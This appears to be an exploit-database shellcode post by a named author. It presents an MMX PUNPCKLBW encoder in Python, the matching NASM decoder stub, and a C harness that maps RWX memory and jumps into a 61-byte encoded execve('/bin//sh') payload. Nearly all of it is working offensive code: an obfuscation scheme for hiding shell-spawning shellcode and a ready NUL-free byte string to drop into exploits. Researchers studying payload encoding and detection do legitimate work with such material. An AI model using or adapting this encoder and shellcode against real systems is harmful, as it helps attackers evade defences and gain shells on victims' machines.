


MMX-PUNPCKLBW Encoder Shellcode (61 bytes)



################################################################################
INTRO
################################################################################

# Exploit Title: MMX-PUNPCKLBW Encoder
# Description: Payload encoder/decoder pair built around the MMX PUNPCKLBW instruction. The decoder stub rewrites the encoded payload in place, so the whole blob must be loaded into memory that is both writable and executable.
# Date: 13/04/2019
# Exploit Author: Petr Javorik
# Tested on: Linux ubuntu 3.13.0-32-generic x86
# Shellcode length: 61

################################################################################
ENCODER
################################################################################

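#!/usr/bin/env python
"""
MMX PUNPCKLBW payload encoder.

The decoder stub (DECODER section below) walks the payload in 8-byte blocks:
it loads bytes 0-3 and 4-7 of each block into two MMX registers and
PUNPCKLBW-interleaves them, so a stored block [a0 a1 a2 a3 b0 b1 b2 b3] is
rewritten as [a0 b0 a1 b1 a2 b2 a3 b3].  The encoder therefore emits each
block as [x0 x2 x4 x6 x1 x3 x5 x7] and prefixes the whole payload with a
one-byte block count, which the decoder loads into CL.

Output format is unchanged from the original script: count byte, then the
shuffled blocks, with padding NOPs that land at the very end of the encoded
buffer dropped.  The decoder still processes whole blocks, so it reads and
rewrites up to 7 bytes past the shortened payload -- leave that slack wherever
the shellcode is placed.
"""

NOP = 0x90
BLOCK = 8
# Position i of an encoded block holds original byte INTERLEAVE[i].
INTERLEAVE = (0, 2, 4, 6, 1, 3, 5, 7)
MAX_BLOCKS = 0xff  # the decoder keeps the block count in CL (one byte)

# stack execve("/bin//sh")
SHELLCODE = bytearray(
    b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
)


def encode_punpcklbw(shellcode):
    """Return the encoded payload as a list of ints: [block_count] + shuffled bytes.

    shellcode: bytes/bytearray holding the raw payload. Must be non-empty and
        fit in 255 blocks (2040 bytes) once padded.
    Raises ValueError when the payload is empty or needs more than 255 blocks.
    """
    payload = bytearray(shellcode)
    if not payload:
        raise ValueError('empty shellcode')

    # Pad to a whole number of 8-byte blocks.  (-len) % 8 adds nothing when the
    # length is already a multiple of 8, instead of a useless all-NOP block
    # (which would also make the decoder touch 8 more bytes than necessary).
    real_len = len(payload)
    payload.extend([NOP] * ((-real_len) % BLOCK))

    block_count = len(payload) // BLOCK
    if block_count > MAX_BLOCKS:
        raise ValueError(
            'payload needs {} blocks, decoder supports at most {}'.format(block_count, MAX_BLOCKS)
        )

    # Shuffle each block, remembering which bytes are padding rather than code.
    encoded = []  # (byte, is_padding)
    for block_num in range(block_count):
        base = BLOCK * block_num
        for src in INTERLEAVE:
            idx = base + src
            encoded.append((payload[idx], idx >= real_len))

    # Drop trailing PADDING bytes only.  Stripping on value alone (0x90) would
    # also eat a genuine trailing NOP of the shellcode, which the decoder would
    # then replace with whatever happens to follow the payload in memory.
    while encoded and encoded[-1][1]:
        encoded.pop()

    return [block_count] + [byte for byte, _ in encoded]


if __name__ == '__main__':
    encoded_payload = encode_punpcklbw(SHELLCODE)
    # Length printed here excludes the 35-byte decoder stub.
    print('Payload length: {}'.format(len(encoded_payload)))
    print(''.join('\\x{:02x}'.format(byte) for byte in encoded_payload))
    print(','.join('0x{:02x}'.format(byte) for byte in encoded_payload))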

################################################################################
DECODER
################################################################################

; MMX PUNPCKLBW decoder stub (NASM, Intel syntax, 32-bit Linux, no external
; references).  Assembled layout: [jmp][decoder][call][count byte][encoded blocks].
; The call/pop pair hands the decoder the address of the count byte, and the
; payload is decoded IN PLACE -- the stub must therefore be loaded into memory
; that is both writable and executable.
; Each iteration rewrites one 8-byte block:
;   stored [x0 x2 x4 x6 x1 x3 x5 x7]  ->  [x0 x1 x2 x3 x4 x5 x6 x7]
; The loop always runs for the full block count, so it reads and writes
; count*8 bytes from the first encoded block even when the encoder stripped
; trailing padding: up to 7 bytes past the listed payload are touched (and the
; 8-byte load at [edi+4] reaches 4 bytes further; only its low dword is used).
global _start

section .text
_start:

    jmp short call_decoder                  ; reach the call at the end so its backward rel32 carries no NUL bytes

decoder:

    pop edi                                 ; edi = &count byte (the "return address" pushed by the call)
    xor ecx, ecx
    mov cl, [edi]                           ; ecx = number of 8-byte blocks; a single byte, so at most 255
    inc edi                                 ; edi = first encoded block
    mov esi, edi                            ; esi = start of the decoded shellcode, entered when the loop ends

decode:

    movq mm0, qword [edi]                   ; low dword: x0 x2 x4 x6
    movq mm1, qword [edi +4]                ; low dword: x1 x3 x5 x7 (high dword is loaded but unused)
    punpcklbw mm0, mm1                      ; interleave the low bytes -> x0 x1 x2 x3 x4 x5 x6 x7
    movq qword [edi], mm0                   ; write the decoded block back over the encoded one
    add edi, 0x8
    loop decode                             ; legacy LOOP kept deliberately: 2-byte encoding beats speed here
    jmp esi                                 ; no EMMS: control never comes back to code that might use x87

call_decoder:

    call decoder                            ; pushes &EncodedShellcode, which decoder pops into edi
    EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80

################################################################################
TESTING
################################################################################

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

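/*
 * Decoder stub (35 bytes, see DECODER) followed by the encoded payload
 * (26 bytes): the block-count byte 0x04, three full shuffled blocks, and the
 * single surviving byte (0x80) of the fourth block whose padding NOPs the
 * encoder stripped.  61 bytes in total, no NUL bytes.
 */
unsigned char code[] =
    "\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04"
    "\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff"
    "\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50"
    "\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80";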

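/*
 * Test harness.  Copies the decoder stub + encoded payload into an anonymous
 * RWX mapping and jumps to it instead of executing the global array directly:
 *   - the decoder rewrites the payload in place, so it needs writable AND
 *     executable memory (running from .data would require `-z execstack`);
 *   - the decoder processes whole 8-byte blocks, so it reads and writes up to
 *     7 bytes past the stripped payload -- with the bare array that overruns
 *     `code[]`; the page-sized mapping provides the slack.
 * Build 32-bit (`-m32`); the stub uses int 0x80 and 32-bit registers.
 * Returns 1 if the mapping cannot be created; otherwise never returns, since
 * the decoded payload execve()s /bin//sh.
 */
int main(void)
{
    const size_t len = sizeof(code) - 1;   /* drop the string terminator */
    const size_t map_len = 4096;
    unsigned char *buf;

    printf("Shellcode Length:  %zu\n", len);
    /* strlen() stops at the first NUL; a mismatch means a bad char crept in. */
    if (strlen((const char *)code) != len)
        fprintf(stderr, "warning: shellcode contains NUL bytes\n");

    buf = mmap(NULL, map_len, PROT_READ | PROT_WRITE | PROT_EXEC,
               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) {
        perror("mmap");   /* e.g. denied by a policy forbidding W+X mappings */
        return 1;
    }
    memset(buf, 0, map_len);
    memcpy(buf, code, len);

    ((void (*)(void))buf)();
    return 0;   /* not reached */
}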

################################################################################


Kind Regards
------------------------------

Bc. Petr Javorik
www.mmquant.net
 maple@mmquant.net
            





https://www.exploit-db.com/exploits/46696



